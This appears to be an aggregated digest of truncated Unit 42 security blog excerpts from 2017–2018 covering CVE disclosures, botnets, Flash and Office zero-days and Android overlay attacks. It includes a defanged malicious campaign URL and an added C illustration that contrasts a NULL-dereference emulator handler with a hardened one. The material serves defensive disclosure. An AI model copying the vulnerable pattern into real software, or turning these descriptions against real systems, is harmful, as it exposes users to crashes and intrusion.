## Threat Brief: Embrace Mobile Banking with Caution
Unit 42
Published: October 23, 2018
High Profile Threats
Learning Hub
Banking
Banking trojans
Mobile
Online banking
The Brazilian Central Bank recently announced that 2017 was the first year in which people did more banking using mobile devices than on PCs. There were 24.5 billion mobile banking transactions while there were 20.6 billion PC-based transactions.
Not all countries are embracing mobile banking as quickly as Brazil, but mobile banking use is picking up around the globe.
What is it?
As more people move to mobile banking, we believe attackers will focus their attacks away from PC banking and towards mobile banking. This means the risks of losing control of your accounts through mobile online banking are likely to
Unit42
Unit 42 Vulnerability Research October 2018 Disclosures – Adobe
blogs_unit42·2018-10-05·CVSS 7.8
[HIGH] Unit 42 Vulnerability Research October 2018 Disclosures – Adobe
## Unit 42 Vulnerability Research October 2018 Disclosures – Adobe
Unit 42
Published: October 5, 2018
Threat Research
Vulnerabilities
Adobe
As part of Unit 42’s ongoing threat research, we can now disclose that Palo Alto Networks Unit 42 researchers have discovered ten vulnerabilities addressed by the Adobe Product Security Incident Response Team (PSIRT) as part of their October 2018 APSB18-30 security update release.
| CVE | Vulnerability Category | Impact | Maximum Severity Rating | Researcher(s) |
|---|---|---|---|---|
| CVE-2018-12769 | Use After Free | Arbitrary Code Execution | Critical | Gal De Leon |
| CVE-2018-12832 | Heap Overflow | Arbitrary Code Execution | Critical | Gal De Leon |
| CVE-2018-12836 | Heap Overflow | Arbitrary Code Execution | Critical | Gal De Leon |
| CVE-2018-12846 | Heap Overflow | Arbitrary Code Execu | | |
Unit42
Multi-exploit IoT/Linux Botnets Mirai and Gafgyt Target Apache Struts, SonicWall
blogs_unit42·2018-09-10·CVSS 9.8
CVE-2017-5638 [CRITICAL] Multi-exploit IoT/Linux Botnets Mirai and Gafgyt Target Apache Struts, SonicWall
## Multi-exploit IoT/Linux Botnets Mirai and Gafgyt Target Apache Struts, SonicWall
Ruchna Nigam
Published: September 9, 2018
Malware
Threat Research
Vulnerabilities
Apache Struts
BlackNurse
Botnet
CVE-2017-5638
CVE-2018-9866
Exploits
Gafgyt
IoT
Linux
Mirai
SonicWall RCE
Executive Summary:
Unit 42 has uncovered new variants of the well-known IoT botnets Mirai and Gafgyt. These are the IoT botnets associated with unprecedented Distributed Denial of Service attacks in November 2016 and since.
These variants are notable for two reasons:
The new Mirai version targets the same Apache Struts vulnerability associated with the Equifax data breach in 2017.
The new Gafgyt version targets a newly disclosed vulnerability affectin
Unit42
Traps Prevents In-The-Wild VBScript Zero-Day Exploit in Internet Explorer
blogs_unit42·2018-09-07·CVSS 7.5
CVE-2018-8373 [HIGH] Traps Prevents In-The-Wild VBScript Zero-Day Exploit in Internet Explorer
## Traps Prevents In-The-Wild VBScript Zero-Day Exploit in Internet Explorer
Tomer Harpaz
Maor Dokhanian
Published: September 7, 2018
Malware
Threat Research
Vulnerabilities
CVE-2018-8373
DarkHotel
On August 15, Trend Micro published a blog post detailing a high-risk vulnerability in the VBScript Engine of Microsoft Internet Explorer being exploited in-the-wild (CVE-2018-8373). This vulnerability still affects endpoints running the latest versions of Internet Explorer and Windows which do not have the relevant patches applied.
The exploit was served on a malicious web host: hxxp://windows-updater[.]net/realmuto/wood.php?who=1?????? which was linked to the DarkHotel APT campaign by Qihoo 360, and this actor also exploi
Unit42
Slicing and Dicing CVE-2018-5002 Payloads: New CHAINSHOT Malware
blogs_unit42·2018-09-06·CVSS 7.8
CVE-2018-5002 [HIGH] Slicing and Dicing CVE-2018-5002 Payloads: New CHAINSHOT Malware
## Slicing and Dicing CVE-2018-5002 Payloads: New CHAINSHOT Malware
Dominik Reichel
Esmid Idrizovic
Published: September 6, 2018
Malware
Threat Research
Vulnerabilities
Adobe
CHAINSHOT
CVE-2018-5002
Zero-day
This story begins with one of our blog authors, who, following the discovery of a new Adobe Flash 0-day, found several documents using the same exploit that were used in targeted attacks. We were also able to collect network captures including the encrypted malware payload. Armed with these initial weaponized documents, we uncovered additional attacker network infrastructure, were able to crack the 512-bit RSA keys, and decrypt the exploit and malware payloads. We have dubbed the malware ‘CHAINSHOT’, because it is a targeted attack with several stages and every stage depen
Unit42
Web-based Threats-2018 Q2: U.S. Remains #1 in Malicious Web Addresses, China Falls from #2 to #7
blogs_unit42·2018-09-05·CVSS 7.5
CVE-2018-8174 [HIGH] Web-based Threats-2018 Q2: U.S. Remains #1 in Malicious Web Addresses, China Falls from #2 to #7
## Web-based Threats-2018 Q2: U.S. Remains #1 in Malicious Web Addresses, China Falls from #2 to #7
Bo Qu
Tao Yan
Rongbo Shao
Zhanglin He
Published: September 5, 2018
Malware
Trend Reports
Vulnerabilities
CVE-2018-8174
ELink
Executive Summary
In Q2, the United States was number one for hosting malicious domains and exploit kits.
Unit 42 regularly analyzes statistical data from our Email Link Analysis (ELINK) to understand the patterns and trends in current web threats. This blog outlines our analysis for April – June (Q2) 2018 and follows up our previous blog analyzing web-based threats for January – March (Q1) 2018 that can be found here. We also provide detailed analysis of attacks against CVE-2018-8174 (a vulnerabil
Unit42
Threat Brief: Information on Critical Apache Struts Vulnerability CVE-2018-11776
blogs_unit42·2018-08-24·CVSS 8.8
CVE-2018-11776 [HIGH] Threat Brief: Information on Critical Apache Struts Vulnerability CVE-2018-11776
## Threat Brief: Information on Critical Apache Struts Vulnerability CVE-2018-11776
Unit 42
Published: August 24, 2018
High Profile Threats
Vulnerabilities
Apache
CVE-2018-11776
Protections
Struts
Situation Overview
On August 22, 2018, the Apache Foundation released a critical security update for CVE-2018-1176, a remote code execution vulnerability affecting Apache Struts versions 2.3 to 2.3.34 and 2.5 to 2.5.16. The Apache Foundation has urged everyone to apply the security updates as soon as possible.
This blog is to provide information to help organizations assess their risk of the vulnerability and to inform Palo Alto Networks customers of protections in place that can help mitigate their risk until they can apply the security updates. Palo Alto Networks customers who have d
Unit42
Four Unit 42 Vulnerability Researchers Make MSRC Top 100 for 2018
blogs_unit42·2018-08-16·CVSS 6.5
[MEDIUM] Four Unit 42 Vulnerability Researchers Make MSRC Top 100 for 2018
## Four Unit 42 Vulnerability Researchers Make MSRC Top 100 for 2018
Unit 42
Published: August 16, 2018
Threat Research
Vulnerabilities
Black Hat
Bounty Program Top 100
Microsoft
Microsoft Security Response Center (MSRC)
Palo Alto Networks Unit 42 is proud to announce that four of our researchers were named to the Microsoft Security Response Center (MSRC) “Top 100 Security Researchers List” for 2018. This is the third year Unit 42 researchers have been included in this prestigious list, which is announced every year at Black Hat. This year’s Unit 42 winners are:
| Rank | Name |
|---|---|
| 10 | Gal De Leon |
| 13 | Hui Gao |
| 73 | Tao Yan |
| 79 | Jin Chen |
Palo Alto Networks is a regular contributor to vulnerability research in Microsoft, Adobe, Apple, Android and other ecosystems. By proactively identify
Unit42
Threat Brief: Cyber Attackers Using Your Home Router To Bring Down Websites
blogs_unit42·2018-08-14
Threat Brief: Cyber Attackers Using Your Home Router To Bring Down Websites
## Threat Brief: Cyber Attackers Using Your Home Router To Bring Down Websites
Unit 42
Published: August 14, 2018
High Profile Threats
Threat Research
Vulnerabilities
Botnets
DDoS
IoT
Routers
In recent research , Palo Alto Networks found attackers were targeting home routers to take control and use them for attacks against other websites that can bring them down. Here we explain this type of attack and what you should do.
Why should I care, what can it do to me?
These attacks could affect you in two ways:
They can slow down or disrupt your internet connection,
They can also make you an unwitting participant in attacks against other websites.
What causes this kind of attack?
Weak passwords and out-of-date software can both enable attackers to take complete control of your hom
Unit42
The Gorgon Group: Slithering Between Nation State and Cybercrime
blogs_unit42·2018-08-02·CVSS 7.8
CVE-2017-0199 [HIGH] The Gorgon Group: Slithering Between Nation State and Cybercrime
## The Gorgon Group: Slithering Between Nation State and Cybercrime
Robert Falcone
David Fuertes
Josh Grunzweig
Kyle Wilhoit
Published: August 2, 2018
Malware
Threat Actor Groups
Threat Research
Vulnerabilities
CVE-2017-0199
Gorgon Group
Subaat
Unit 42 researchers have been tracking Subaat, an attacker, since 2017. Recently Subaat drew our attention due to renewed targeted attack activity. Part of monitoring Subaat included realizing the actor was possibly part of a larger crew of individuals responsible for carrying out targeted attacks against worldwide governmental organizations. Technical analysis of some of the attacks, as well as attribution links with Pakistan-based actors, has already been described by 360 and Tu
Unit42
Analysis of the DHCP Client Script Code Execution Vulnerability (CVE-2018-1111)
blogs_unit42·2018-07-16·CVSS 7.5
CVE-2018-1111 [HIGH] Analysis of the DHCP Client Script Code Execution Vulnerability (CVE-2018-1111)
## Analysis of the DHCP Client Script Code Execution Vulnerability (CVE-2018-1111)
Jin Chen
Published: July 16, 2018
Threat Research
Vulnerabilities
CVE-2018-1111
In May 2018, a command injection flaw was found in the NetworkManager integration script included in the DHCP client packages in multiple versions of Red Hat Enterprise Linux (CVE-2018-1111), which has since been patched. An attacker could attack this vulnerability either through the use of a malicious DHCP server, or through malicious, spoofed DHCP responses on the local network. A successful attack could execute arbitrary commands with root privileges on systems using NetworkManager with DHCP configured.
This vulnerability poses a serious threat to individuals or organizations running vulnerable instances of Red Hat Enterprise
Unit42
Unit 42 Vulnerability Research July 2018 Disclosures – Adobe
blogs_unit42·2018-07-11·CVSS 9.8
[CRITICAL] Unit 42 Vulnerability Research July 2018 Disclosures – Adobe
## Unit 42 Vulnerability Research July 2018 Disclosures – Adobe
Unit 42
Published: July 11, 2018
Threat Research
Vulnerabilities
Adobe
As part of Unit 42’s ongoing threat research, we can now disclose that Palo Alto Networks Unit 42 researchers have discovered eight vulnerabilities addressed by the Adobe Product Security Incident Response Team (PSIRT) as part of their July 2018 security update release.
| CVE | Vulnerability Name | Maximum Severity Rating | Impact | Researcher(s) |
|---|---|---|---|---|
| CVE-2018-5009 | Use-after-free | Critical | Arbitrary Code Execution | Gal De Leon |
| CVE-2018-5021 | Out-of-bounds write | Critical | Arbitrary Code Execution | Bo Qu |
| CVE-2018-5022 | Out-of-bounds read | Important | Information Disclosure | Bo Qu |
| CVE-2018-5023 | Out-of-bounds read | Important | Information Disclosure | Zhangl |
Unit42
The Old and New: Current Trends in Web-based Threats
blogs_unit42·2018-06-20·CVSS 9.3
CVE-2014-6332 [CRITICAL] The Old and New: Current Trends in Web-based Threats
## The Old and New: Current Trends in Web-based Threats
Tao Yan
Bo Qu
Zhanglin He
Rongbo Shao
Published: June 20, 2018
Malware
Trend Reports
Vulnerabilities
CVE-2014-6332
CVE-2016-0189
EK
Exploit kit
KaiXin
Rig
Sundown
Summary
In this blog, Unit 42 is sharing analysis and statistics from our Email Link Analysis (ELINK) from the first quarter of 2018 and highlighting interesting findings of current web threats. We will first describe statistical information about CVEs, malicious URLs and Exploit Kits (EKs), then discuss the current life cycle of these web-based threats, and wrap up with two case studies about evolving EKs and a cryptocurrency miner.
Statistics analysis
CVEs
In the first quarter of 2018, we found 1
Unit42
Unit 42 Vulnerability Research May 2018 Disclosures – Adobe
blogs_unit42·2018-05-16·CVSS 9.8
[CRITICAL] Unit 42 Vulnerability Research May 2018 Disclosures – Adobe
## Unit 42 Vulnerability Research May 2018 Disclosures – Adobe
Unit 42
Published: May 16, 2018
Threat Research
Vulnerabilities
Acrobat
Adobe
As part of Unit 42’s ongoing threat research, we can now disclose that Palo Alto Networks Unit 42 researchers have discovered a vulnerability addressed by the Adobe Product Security Incident Response Team (PSIRT) as part of their May 2018 security update release.
| CVE | Vulnerability Name | Affected Products | Maximum Severity Rating | Impact | Researcher(s) |
|---|---|---|---|---|---|
| CVE-2018-4959 | Use-after-free | Adobe Acrobat and Reader | Critical | Arbitrary Code Execution | Gal De Leon |
| CVE-2018-4961 | Use-after-free | Adobe Acrobat and Reader | Critical | Arbitrary Code Execution | Gal De Leon |
| CVE-2018-4958 | Use-after-free | Adobe Acrobat and Reader | Critical | Arbitrary Code | |
Unit42
Exploit in the Wild: #drupalgeddon2 - Analysis of CVE-2018-7600
blogs_unit42·2018-05-01·CVSS 9.8
CVE-2018-7600 [CRITICAL] Exploit in the Wild: #drupalgeddon2 - Analysis of CVE-2018-7600
## Exploit in the Wild: #drupalgeddon2 - Analysis of CVE-2018-7600
Yanhui Jia
Matthew Tennis
Yi Ren
Rongbo Shao
Published: May 1, 2018
Threat Research
Vulnerabilities
Attacks
CVE-2018-7600
Drupalgeddon2
Exploits
About CVE-2018-7600
On 28 March 2018, the Drupal core security team released security advisory SA-CORE-2018-002 which discusses a highly critical vulnerability, CVE-2018-7600, later nicknamed drupalgeddon2. The vulnerability is present on all Drupal versions 7.x before 7.58, 8.3.x versions before 8.3.9, 8.4.x versions before 8.4.6, and 8.5.x before 8.5.1.
The vulnerability is estimated to impact over one million Drupal users and websites. The vulnerability can enable remote code execution and results from insufficient input validation on the Drupal 7 Form API. Atta
Unit42
It’s Back! Don’t Panic, the Unit 42 Podcast, Returns with New Episodes
blogs_unit42·2018-02-22·CVSS 6.5
CVE-2018-4900 [MEDIUM] It’s Back! Don’t Panic, the Unit 42 Podcast, Returns with New Episodes
## It’s Back! Don’t Panic, the Unit 42 Podcast, Returns with New Episodes
Unit 42
Published: February 22, 2018
Threat Research
Vulnerabilities
Acrobat
Adobe
CVE-2018-4900
It’s time to “Don’t Panic” again!
Palo Alto Networks CSO Rick Howard and Palo Alto Networks Senior Director, Threat Intelligence Ryan Olson are back in the saddle with an all-new season of “Don’t Panic,” the official podcast of Unit 42, the Palo Alto Networks threat intelligence team.
The first three episodes of the new season are posted and available for streaming via our SoundCloud page. In the next few weeks they will be available from additional streaming and download sources, too.
Give them a listen here:
You can find this episode and other Palo Alto Networks podcasts on iTunes, Google Play, or integr
Unit42
Unit 42 Vulnerability Research February 2018 Disclosures - Adobe
blogs_unit42·2018-02-13·CVSS 7.8
CVE-2018-4878 [HIGH] Unit 42 Vulnerability Research February 2018 Disclosures - Adobe
## Unit 42 Vulnerability Research February 2018 Disclosures - Adobe
Unit 42
Published: February 13, 2018
Malware
Threat Research
Vulnerabilities
Adobe
CVE-2018-4878
DogCall
As part of Unit 42’s ongoing threat research, we can now disclose that Palo Alto Networks Unit 42 researchers have discovered a vulnerability addressed by the Adobe Product Security Incident Response Team (PSIRT) as part of their February 2018 security update release.
| CVE | Vulnerability Name | Affected Products | Maximum Severity Rating | Impact | Researcher(s) |
|---|---|---|---|---|---|
| CVE-2018-4900 | Out-of-bounds read | Adobe Acrobat | Important | Remote Code Execution | Gal De Leon |
Palo Alto Networks customers who deploy our Next-Generation Security Platform are protected from zero-day vulnerabilities such as these. Weaponized exploits
Unit42
Traps Prevents Microsoft Office Equation Editor Zero-Day CVE-2018-0802
blogs_unit42·2018-01-19·CVSS 7.8
CVE-2018-0802 [HIGH] Traps Prevents Microsoft Office Equation Editor Zero-Day CVE-2018-0802
## Traps Prevents Microsoft Office Equation Editor Zero-Day CVE-2018-0802
Gal De Leon
Maor Dokhanian
Published: January 19, 2018
Malware
Threat Research
Vulnerabilities
CVE-2018-0802
Equation Editor
Microsoft
Last November, Microsoft manually patched a remotely exploitable vulnerability (CVE-2017-11882) in Equation Editor, which is a program that lets you write a mathematical equation into a document. Our Unit 42 research team provided a detailed analysis on this vulnerability here.
Since then, Microsoft has received additional reports from multiple security vendors that turned out to be related to another vulnerability that was successfully exploited after applying Microsoft’s update – Microsoft assigned it as CVE-2018
Unit42
IoT Malware Evolves to Harvest Bots by Exploiting a Zero-day Home Router Vulnerability
blogs_unit42·2018-01-11·CVSS 9.8
CVE-2014-8361 [CRITICAL] IoT Malware Evolves to Harvest Bots by Exploiting a Zero-day Home Router Vulnerability
## IoT Malware Evolves to Harvest Bots by Exploiting a Zero-day Home Router Vulnerability
Cong Zheng
Claud Xiao
Yanhui Jia
Published: January 11, 2018
Malware
Threat Research
Vulnerabilities
Botnet
IoT
Mirai
Satori
Zero-day
Summary
In early December 2017, 360 Netlab discovered a new malware family which they named Satori. Satori is a derivative of Mirai and exploits two vulnerabilities: CVE-2014-8361, a code execution vulnerability in the miniigd SOAP service in the Realtek SDK, and CVE-2017-17215, a newly discovered vulnerability in Huawei’s HG532e home gateway, patched in early December 2017.
Palo Alto Networks Unit 42 investigated Satori, and from our intelligence data, we have found there are three Satori variants. The
Unit42
Unit 42 Vulnerability Research January 2018 Disclosures - Microsoft
blogs_unit42·2018-01-09·CVSS 7.5
[HIGH] Unit 42 Vulnerability Research January 2018 Disclosures - Microsoft
## Unit 42 Vulnerability Research January 2018 Disclosures - Microsoft
Unit 42
Published: January 9, 2018
Threat Research
Vulnerabilities
Internet Explorer
Microsoft
As part of Unit 42’s ongoing threat research, we can now disclose that Palo Alto Networks Unit 42 researchers have discovered one vulnerability addressed by the Microsoft Security Response Center (MSRC) as part of their January 2018 security update release.
| CVE | Vulnerability Name | Affected Products | Maximum Severity Rating | Impact | Researcher(s) |
|---|---|---|---|---|---|
| CVE-2018-0762 | Scripting Engine Memory Corruption Vulnerability | Internet Explorer 9, 10, 11, Microsoft Edge | Critical | Remote Code Execution | Tao Yan |
Palo Alto Networks customers who deploy our Next-Generation Security Platform are protected from zero-day vulnerabilities s
Unit42
Threat Brief: Meltdown and Spectre Vulnerabilities
blogs_unit42·2018-01-04
Threat Brief: Meltdown and Spectre Vulnerabilities
## Threat Brief: Meltdown and Spectre Vulnerabilities
Unit 42
Published: January 4, 2018
High Profile Threats
Vulnerabilities
AMD
Android
ARM
Intel
Linux
MacOS
Microsoft Windows
Bottom line up front:
The Meltdown and Spectre vulnerabilities are serious vulnerabilities
These vulnerabilities are uniquely broad in scope, potentially affecting nearly every computer and device with a modern processor: Microsoft Windows, Google Android, Google ChromeOS and Apple macOS, on Intel and ARM processors.
These are not code execution vulnerabilities (i.e. wormable): they are information disclosure vulnerabilities
These vulnerabilities pose greatest risk in shared hosting scenarios (i.e. cloud)
The risk these vulnerabilities po
Unit42
Palo Alto Networks Unit 42 Vulnerability Research December 2017 Disclosures - Microsoft
blogs_unit42·2017-12-19·CVSS 7.5
[HIGH] Palo Alto Networks Unit 42 Vulnerability Research December 2017 Disclosures - Microsoft
## Palo Alto Networks Unit 42 Vulnerability Research December 2017 Disclosures - Microsoft
Unit 42
Published: December 19, 2017
Threat Research
Vulnerabilities
Internet Explorer
Microsoft
As part of Unit 42’s ongoing threat research, we can now disclose that Palo Alto Networks Unit 42 researchers have discovered one vulnerability addressed by the Microsoft Security Response Center (MSRC) as part of their December 2017 security update release.
| CVE | Vulnerability Name | Affected Products | Maximum Severity Rating | Impact | Researcher(s) |
|---|---|---|---|---|---|
| CVE-2017-11886 | Scripting Engine Memory Corruption Vulnerability | Internet Explorer 9, 10, 11 | Critical | Remote Code Execution | Hui Gao |
Palo Alto Networks customers who deploy our Next-Generation Security Platform are protected from zero-day vulnerabi
Unit42
Analysis of CVE-2017-11882 Exploit in the Wild
blogs_unit42·2017-12-08·CVSS 7.8
CVE-2017-11882 [HIGH] Analysis of CVE-2017-11882 Exploit in the Wild
## Analysis of CVE-2017-11882 Exploit in the Wild
Yanhui Jia
Published: December 8, 2017
Threat Research
Vulnerabilities
Equation Editor
Microsoft
Recently, Palo Alto Networks Unit 42 vulnerability researchers captured multiple instances of traffic in the wild exploiting CVE-2017-11882, patched by Microsoft on November 14, 2017 as part of the monthly security update process. Exploits for this vulnerability have been released for Metasploit, and multiple security researchers have published articles on specific attacks taking advantage of this vulnerability. In this article, we describe the vulnerability and discuss mechanisms for exploiting it.
About CVE-2017-11882:
Microsoft Equation Editor, which is a Microsoft Office co
Unit42
Palo Alto Networks Unit 42 Vulnerability Research November 2017 Disclosures - Adobe
blogs_unit42·2017-12-06·CVSS 8.8
[HIGH] Palo Alto Networks Unit 42 Vulnerability Research November 2017 Disclosures - Adobe
## Palo Alto Networks Unit 42 Vulnerability Research November 2017 Disclosures - Adobe
Unit 42
Published: December 6, 2017
Threat Research
Vulnerabilities
Acrobat
Adobe
As part of Unit 42’s ongoing threat research, we can now disclose that Palo Alto Networks Unit 42 researchers have discovered seven vulnerabilities addressed by the Adobe Product Security Incident Response Team (PSIRT) as part of their November 2017 security update release.
| CVE | Vulnerability Name | Affected Products | Maximum Severity Rating | Impact | Researcher(s) |
|---|---|---|---|---|---|
| CVE-2017-16388 | Use after free | Adobe Acrobat | Critical | Remote Code Execution | Gal De Leon |
| CVE-2017-16389 | Use after free | Adobe Acrobat | Critical | Remote Code Execution | Gal De Leon |
| CVE-2017-16390 | Use after free | Adobe Acrobat | Critical | Remote Code | |
Unit42
Palo Alto Networks Unit 42 Vulnerability Research November 2017 Disclosures
blogs_unit42·2017-11-22·CVSS 3.1
[LOW] Palo Alto Networks Unit 42 Vulnerability Research November 2017 Disclosures
## Palo Alto Networks Unit 42 Vulnerability Research November 2017 Disclosures
Unit 42
Published: November 22, 2017
Threat Research
Vulnerabilities
Internet Explorer
Microsoft
Microsoft Security Response Center (MSRC)
As part of Unit 42’s ongoing threat research, we can now disclose that Palo Alto Networks Unit 42 researchers have discovered four vulnerabilities addressed by the Microsoft Security Response Center as part of their November 2017 security update release.
| CVE | Vulnerability Name | Affected Products | Maximum Severity Rating | Impact | Researcher(s) |
|---|---|---|---|---|---|
| CVE-2017-11855 | Internet Explorer Memory Corruption Vulnerability | Internet Explorer 9, 10, 11 | Critical | Remote Code Execution (RCE) | Hui Gao |
| CVE-2017-11856 | Internet Explorer Memory Corruption Vulnerability | Internet Explo | | | |
Unit42
Tracking Subaat: Targeted Phishing Attack Leads to Threat Actor's Repository
blogs_unit42·2017-10-27·CVSS 8.8
CVE-2012-0158 [HIGH] Tracking Subaat: Targeted Phishing Attack Leads to Threat Actor's Repository
## Tracking Subaat: Targeted Phishing Attack Leads to Threat Actor's Repository
Unit 42
Published: October 27, 2017
Malware
Threat Research
Vulnerabilities
CVE-2012-0158
Downloader
Phishing
QuasarRAT
Subaat
In mid-July, Palo Alto Networks Unit 42 identified a small targeted phishing campaign aimed at a government organization. While tracking the activities of this campaign, we identified a repository of additional malware, including a web server that was used to host the payloads used for both this attack as well as others. We’ll discuss how we discovered it, as well as possible attribution towards the individual behind these attacks.
The Initial Attack
Beginning on July 16, 2017, Unit 42 observed a small wave of phishing emails targeting a US-based government organization. W
Unit42
Palo Alto Networks Unit 42 Vulnerability Research September and October 2017 Disclosures
blogs_unit42·2017-10-11·CVSS 7.5
[HIGH] Palo Alto Networks Unit 42 Vulnerability Research September and October 2017 Disclosures
## Palo Alto Networks Unit 42 Vulnerability Research September and October 2017 Disclosures
Unit 42
Published: October 11, 2017
Threat Research
Vulnerabilities
Internet Explorer
Microsoft Excel
As part of Unit 42’s ongoing threat research, we can now disclose that Palo Alto Networks Unit 42 researchers have discovered vulnerabilities that have been addressed by Microsoft in their September and October security update releases.
CVE
Vulnerability Name
Affected Products
Researcher
CVE-2017-8567
Microsoft Office Remote Code Execution
Microsoft Excel for Mac 2011
Jin Chen
CVE-2017-8749
Internet Explorer Memory Corruption Vulnerability
Internet Explorer 10, Internet Explorer 11
Hui Gao
CVE-2017-11793
Scripting Engine Memory Corruption Vulnerability
Internet Explorer 9, Int
Unit42
2 Minute Threat Brief: Android Toast Overlay Attack
blogs_unit42·2017-09-14
2 Minute Threat Brief: Android Toast Overlay Attack
## 2 Minute Threat Brief: Android Toast Overlay Attack
Eila Shargh
Published: September 14, 2017
High Profile Threats
Vulnerabilities
Android
Android Toast
Unit 42 released details about a vulnerability that affects Android devices running operating systems older than 8.0 Oreo. The vulnerability leaves Android users at risk of falling victim to an Android Toast Overlay attack. Patches are available that fix this vulnerability, so Android users should get the latest updates as soon as possible.
How it Works
The vulnerability affects the Toast feature on Android devices, an Android feature that allows display messages and notifications of other applications to “pop up,” and allows an attacker to employ an overlay attack.
An overlay attack happens when an attacker places a window o
Unit42
Palo Alto Networks Discovers New QEMU Vulnerability
blogs_unit42·2017-09-14·CVSS 6.5
CVE-2017-12809 [MEDIUM] Palo Alto Networks Discovers New QEMU Vulnerability
## Palo Alto Networks Discovers New QEMU Vulnerability
Ryan Salsamendi
Published: September 14, 2017
Threat Research
Vulnerabilities
QEMU
Palo Alto Networks Unit 42 recently discovered CVE-2017-12809, which is a vulnerability affecting QEMU beginning with version 2.8. We reported this vulnerability and it has been fixed in QEMU version 2.10.0 released on August 30, 2017. The latest version can be obtained from QEMU here.
The vulnerability results from a flaw in the way QEMU’s emulated hard drive controller handles the ATA_CACHE_FLUSH command. The QEMU host process will dereference a NULL pointer if ATA_CACHE_FLUSH is issued to a removable drive with no disk present (the default configuration). This causes the host OS to terminate QEMU. In Windows, this can be triggered from user
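The excerpt above describes the bug class, a guest-reachable NULL pointer dereference in an emulated device handler, but not the code. The following is an added illustration written for this page, not QEMU's source: a simplified model of an IDE drive state whose backend pointer (`blk`) is NULL when a removable drive has no medium, with the unchecked flush handler beside a hardened one that rejects the command with ABRT instead of trusting the pointer. All structure and function names here are assumptions chosen for the model.

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdio.h>

/* Stand-in for a block backend (assumed name). A removable drive with no
 * medium inserted has no backend attached, so blk == NULL below. */
typedef struct BlockBackend {
    const char *name;
    int flushes;            /* how many times the backend was flushed */
} BlockBackend;

/* Simplified per-drive emulator state (assumed layout, not QEMU's). */
typedef struct IDEState {
    BlockBackend *blk;      /* NULL when the (removable) drive is empty */
    bool is_cdrom;
    int status;             /* ATA status register, simplified */
    int error;              /* ATA error register, simplified */
} IDEState;

enum { ATA_STATUS_READY = 0x40, ATA_STATUS_ERR = 0x01 };
enum { ATA_ERR_ABRT = 0x04 };

static int blk_flush(BlockBackend *blk) {
    blk->flushes++;         /* dereference: crashes the process if blk is NULL */
    return 0;
}

/* Vulnerable shape: the handler assumes a backend is always attached and
 * flushes it unconditionally. Issued against a removable drive with no disk,
 * this dereferences NULL and the host OS terminates the emulator process,
 * which is the guest-to-host denial of service the post describes. */
void cmd_flush_cache_unchecked(IDEState *s) {
    blk_flush(s->blk);
    s->status = ATA_STATUS_READY;
    s->error = 0;
}

/* What a real drive reports for a command it cannot carry out. */
static void ide_abort_command(IDEState *s) {
    s->status = ATA_STATUS_READY | ATA_STATUS_ERR;
    s->error = ATA_ERR_ABRT;
}

/* Hardened shape: a command that needs a medium is rejected with ABRT when
 * the drive is empty, rather than trusting the backend pointer. */
void cmd_flush_cache_checked(IDEState *s) {
    if (s->blk == NULL) {
        ide_abort_command(s);
        return;
    }
    blk_flush(s->blk);
    s->status = ATA_STATUS_READY;
    s->error = 0;
}

/* True when the command was rejected (ERR + ABRT) rather than executed. */
bool flush_was_aborted(const IDEState *s) {
    return (s->status & ATA_STATUS_ERR) && (s->error & ATA_ERR_ABRT);
}

/* Issue a cache flush through the checked handler against an empty or a
 * populated drive. Returns -1 if the command was aborted, otherwise the
 * number of backend flushes performed. */
int run_flush(bool with_medium) {
    BlockBackend backend = { "disk0", 0 };
    IDEState s = { with_medium ? &backend : NULL, true, 0, 0 };
    cmd_flush_cache_checked(&s);
    return flush_was_aborted(&s) ? -1 : backend.flushes;
}

int main(void) {
    printf("empty drive:  %s\n", run_flush(false) < 0 ? "ABRT" : "flushed");
    printf("with medium:  %d flush(es)\n", run_flush(true));
    /* cmd_flush_cache_unchecked() on an empty drive would SIGSEGV; not called. */
    return 0;
}
```

The point to carry over to any emulated device is that the guest controls which command reaches which drive; every handler that touches a per-drive backend has to treat "no medium" as a legitimate state and fail the command the way the hardware would, not assume the pointer is populated.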
Unit42
Threat Brief: Patch Today and Don’t Get Burned by an Android Toast Overlay
blogs_unit42·2017-09-07
Threat Brief: Patch Today and Don’t Get Burned by an Android Toast Overlay
Threat Research Center
High Profile Threats
Vulnerabilities
## Threat Brief: Patch Today and Don’t Get Burned by an Android Toast Overlay
Unit 42
Published: September 7, 2017
High Profile Threats
Vulnerabilities
Android
Cloak and Dagger
Toast Overlay Attack
Today, Palo Alto Networks Unit 42 researchers are announcing details on a new high-severity vulnerability affecting the Google Android platform. Patches for this vulnerability are available as part of the September 2017 Android Security Bulletin. This new vulnerability does NOT affect Android 8.0 Oreo, the latest version; but it does affect all prior versions of Android. There is some malware that exploits some vectors outlined in this article, but Palo Alto Networks Unit 42 is not aware of any active attacks against thi
Unit42
Android Toast Overlay Attack: “Cloak and Dagger” with No Permissions
blogs_unit42·2017-09-07
Android Toast Overlay Attack: “Cloak and Dagger” with No Permissions
## Android Toast Overlay Attack: “Cloak and Dagger” with No Permissions
Cong Zheng
Wenjun Hu
Xiao Zhang
Zhi Xu
Published: September 7, 2017
Ransomware
Threat Research
Vulnerabilities
Android
Cloak and Dagger
Palo Alto Networks Unit 42 researchers have uncovered a high severity vulnerability in the Android overlay system, which allows a new Android overlay attack by using the “Toast type” overlay. All Android devices with OS version < 8.0 are affected by this vulnerability and patches are available as part of the September 2017 Android Security Bulletin. Android 8.0 was just released and is unaffected by this vulnerability. Because Android 8.0 is recent, this vulnerability affects nearly all Android devices currently in the market (see Table 1) and users should apply updates
Unit42
Palo Alto Networks Unit 42 Vulnerability Research August 2017 Disclosures
blogs_unit42·2017-08-18·CVSS 7.5
CVE-2017-8651 [HIGH] Palo Alto Networks Unit 42 Vulnerability Research August 2017 Disclosures
## Palo Alto Networks Unit 42 Vulnerability Research August 2017 Disclosures
Unit 42
Published: August 18, 2017
Threat Research
Vulnerabilities
Internet Explorer
Microsoft
As part of Unit 42’s ongoing threat research, we can now disclose that Palo Alto Networks Unit 42 researchers have discovered one remote code execution vulnerability affecting Microsoft Internet Explorer 9 and 10 that was addressed in Microsoft’s August 2017 monthly security update release:
CVE-2017-8651 : Hui Gao
Traps, Palo Alto Networks advanced endpoint solution, can block memory corruption based exploits of this nature.
Palo Alto Networks is a regular contributor to vulnerability research in Microsoft, Adobe, Apple, Google Android and other ecosystems. By proactively identifying these vulnerabilities,
Unit42
Microsoft Honors 5 Unit 42 Researchers for Vulnerability Research
blogs_unit42·2017-08-07·CVSS 6.5
[MEDIUM] Microsoft Honors 5 Unit 42 Researchers for Vulnerability Research
## Microsoft Honors 5 Unit 42 Researchers for Vulnerability Research
Samantha Pierre
